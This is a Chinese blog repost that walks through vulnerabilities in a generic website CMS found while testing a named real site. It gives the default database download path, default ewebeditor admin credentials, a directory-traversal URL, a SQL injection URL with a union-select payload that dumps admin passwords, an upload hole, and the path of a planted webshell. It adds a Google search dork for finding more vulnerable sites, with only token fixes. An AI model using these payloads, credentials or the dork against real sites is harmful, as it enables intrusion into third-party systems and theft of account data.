通用网站系统漏洞及修复方法
来源:互联网 发布:飞秋2017 mac 编辑:程序博客网 时间:2024/05/20 21:23
今天在测试渗透一网站时,旁注发现这套程序。版权未知。
问题很多,发出来大家了解下。
请勿非法入侵他人网站/系统,否则后果自负!
默认网站数据库:
http://www.08.tv/data/nxnews.mdb (做为一个合格的站长,这个不用说怎么做了吧?)
ewebeditor 在线编辑器:
http://www.08.tv/ewebeditor/admin_login.asp
帐户/密码:admin admin
登陆后可遍历目录:ewebedtior/admin_uploadfile.asp?id=22&dir=../../data
Sql注入漏洞:
http://www.08.tv/detail.asp?id=12
exp:
union select 1,admin,password,4,5,6,7,8 from admin
爆出明文帐号/密码
上传漏洞:
http://www.08.tv/manage/upfile.asp 传说中的双文件上传。当然,你也可以用工具。如明小子。
webshell: http://www.08.tv/manage/tupian/201108102214.asp
简单修复:修改默认数据库、后台路径/删除ewebedtior目录下admin_login.asp/增加防注入系统/对upfile.asp作验证
google:inurl:news.asp?lanmuName=
京华志: 这样的漏洞 一般是属于最初级的了 但是往往有很多站长不注意 所以还能拿下很多站的 如果想更快 更精准的获取更多BUG 0DAY
漏洞信息 请关注京华志 www.jinghuazhi.com
本文来源于:凯里黑客http://www.0855.tv ,转载请注明来处,谢谢!
- 通用网站系统漏洞及修复方法
- 修复数据库(sql server)方法及步骤 (通用)
- ZDSoft 网站生成系统漏洞
- 正方高校教务管理系统漏洞修复
- 如何修复和检测Windows系统漏洞
- 网站安全检测通用方法
- 利用万能密码登陆网站后台原理及漏洞修复方法
- actcms网站管理系统漏洞0day
- 网站恶意代码陷阱分析及修复代码
- [系统安全]目前修复系统漏洞最好的中文软件
- Windows安全攻略:教你完全修复系统漏洞
- 良精企业通用建站系统漏洞总汇
- 大型网站性能优化的通用方法
- 大型网站性能优化的通用方法
- 大型网站性能优化的通用方法
- 恶意网页症状及修复方法
- 恶意网页症状及修复方法
- “组件服务”假死及MSDTC修复方法
- 如何获得 Qt窗口部件在主窗口中的位置--确定鼠标是否在某一控件上与在控件上的位置
- 朋友推荐的web UI 框架
- JavaScript 中美元符号 $ 是什么
- C语言堆栈入门——堆和栈的区别
- 内核_如何加载自己写的模块[ZT]
- 通用网站系统漏洞及修复方法
- 常用htaccess.文件配置,轻松上手
- 集群神器——terracotta与各种框架的整合
- 冷山的博客思听书摘索引页
- 在VC中调用fortran生成的dll
- TCP协议握手OPTION字段解析及其应用 | 本真心灵
- 使用Qt设计师(Qt Designer)快速设计窗体
- 关于MYSQL持久连接
- thumbnail解码